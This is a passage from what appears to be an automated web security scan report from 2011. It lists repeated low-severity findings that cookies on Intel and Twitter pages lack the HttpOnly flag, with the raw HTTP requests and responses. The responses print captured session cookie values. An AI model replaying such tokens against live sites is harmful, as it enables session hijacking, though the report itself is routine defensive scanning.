X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=23acb205107344b897198d1b0053cbc6; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 36724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.39. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:50 GMT
Content-Length: 512
Connection: close
Set-Cookie: PHPSESSID=de5232cce9bb1b07e0e2c06efb170581; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:50 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

12.40. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=3132f08882351b5b69f11ba86bbd295a; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 36511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.41. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:46 GMT
Content-Length: 578
Connection: close
Set-Cookie: PHPSESSID=00b720de8f611fc1545738ce8829c525; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:46 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

12.42. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=d05389110c2d2011353f05e29b09f232; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 36400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.43. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:44 GMT
Content-Length: 510
Connection: close
Set-Cookie: PHPSESSID=0b26808766bae72a678c3d39c963c461; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:44 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

12.44. http://software.intel.com/en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:40 GMT
Content-Length: 20519
Connection: close
Set-Cookie: PHPSESSID=a638f3cc0588735e2cef74d00d31654d; path=/; domain=intel.com
Set-Cookie: loginpt=0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.45. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=870d40b73302ba266471c5df270a786b; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 38292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.46. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:37 GMT
Content-Length: 580
Connection: close
Set-Cookie: PHPSESSID=9f96f042ab3fd9912fec4ad3f015ce74; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:37 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

12.47. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=7c7fa33f5e3871a2f2f8ad2e5fc6cc5f; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 40744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.48. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:37 GMT
Content-Length: 522
Connection: close
Set-Cookie: PHPSESSID=6d3271afbdfbfe0b4dd22d4ac3e9d131; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:37 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

12.49. http://software.intel.com/sites/academic_showcase/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /sites/academic_showcase/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/academic_showcase/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:22:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=f5d3a15404bf24e6472fb4f75010d9f2; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 50705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

12.50. http://twitter.com/EricMMartin  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /EricMMartin

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EricMMartin HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 05 Feb 2011 23:22:34 GMT
Server: hi
Status: 200 OK
X-Transaction: Sat Feb 05 23:22:34 +0000 2011-15854-13086
ETag: "b0c81407bf609b9b1cf953048b1105ab"
Last-Modified: Sat, 05 Feb 2011 23:22:34 GMT
X-Runtime: 0.00598
Content-Type: text/html; charset=utf-8
Content-Length: 58433
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296948154509230; path=/; expires=Sat, 12-Feb-11 23:22:34 GMT; domain=.twitter.com
Set-Cookie: guest_id=129694815451621917; path=/; expires=Mon, 07 Mar 2011 23:22:34 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJZQIvgtAToHaWQiJTMyMDRkZDM2M2Y2OTVm%250AMjM0ZWVmYjAyMjcyMGRlYWM0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--cda732cdfd73b9251d4ab751bf5e3c3ba07fa792; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

12.51. http://twitter.com/intel  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /intel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /intel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 05 Feb 2011 23:22:35 GMT
Server: hi
Status: 200 OK
X-Transaction: Sat Feb 05 23:22:35 +0000 2011-36832-54399
ETag: "3f5b73f849632157648b0cfb3f55a625"
Last-Modified: Sat, 05 Feb 2011 23:22:35 GMT
X-Runtime: 0.00573
Content-Type: text/html; charset=utf-8
Content-Length: 57222
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296948155814524; path=/; expires=Sat, 12-Feb-11 23:22:35 GMT; domain=.twitter.com
Set-Cookie: guest_id=129694815582299188; path=/; expires=Mon, 07 Mar 2011 23:22:35 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCK9VIvgtAToHaWQiJTZlNDMwNDM3NzI0Y2Zk%250AMzE2ZDVlMGRkYTQ2ZGMyNzdjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a5011ad7a2fc54a431253ef8fa174a4aab1fa4cd; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

12.52. http://twitter.com/intelnews  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /intelnews

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /intelnews HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 05 Feb 2011 23:22:36 GMT
Server: hi
Status: 200 OK
X-Transaction: Sat Feb 05 23:22:36 +0000 2011-99178-30534
ETag: "5ef92426ebdf2d0090dae9af07327303"
Last-Modified: Sat, 05 Feb 2011 23:22:36 GMT
X-Runtime: 0.00428
Content-Type: text/html; charset=utf-8
Content-Length: 50405
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296948156798428; path=/; expires=Sat, 12-Feb-11 23:22:36 GMT; domain=.twitter.com
Set-Cookie: guest_id=129694815680453038; path=/; expires=Mon, 07 Mar 2011 23:22:36 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIVZIvgtAToHaWQiJWQ5Yzk4ZmY4Yzc2ODMw%250ANDBmOWI3NmU3NTA5N2I5MmU1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e3633c355f5d65ff6cfe5bdaa2b0cfdaeeaa156d; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

12.53. http://twitter.com/share  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /share

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /share HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 403 Forbidden
Date: Sat, 05 Feb 2011 23:22:38 GMT
Server: hi
Status: 403 Forbidden
X-Transaction: Sat Feb 05 23:22:38 +0000 2011-20811-53000
Last-Modified: Sat, 05 Feb 2011 23:22:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4792
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296948158732884; path=/; expires=Sat, 12-Feb-11 23:22:38 GMT; domain=.twitter.com
Set-Cookie: guest_id=129694815873954823; path=/; expires=Mon, 07 Mar 2011 23:22:38 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCBRhIvgtAToHaWQiJTYzNjY1ZmI2MzZkY2Iz%250AYjIyM2Y1ZDA2MTMwN2NiMTYwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--686e305c212123b2dc28c72a24dcf76ac929959b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>

<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Language" content="en-us" />
<title>Twitter / Valid URL par
...[SNIP]...

12.54. http://www.intc.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?iid=gg_about+home_intc HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A05%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:06 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:06 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:06 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.55. http://www.intc.com/alerts.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /alerts.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alerts.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:15:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A06%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:06 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:06 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:06 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.56. http://www.intc.com/analystCenter.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /analystCenter.cfm

Issue detail

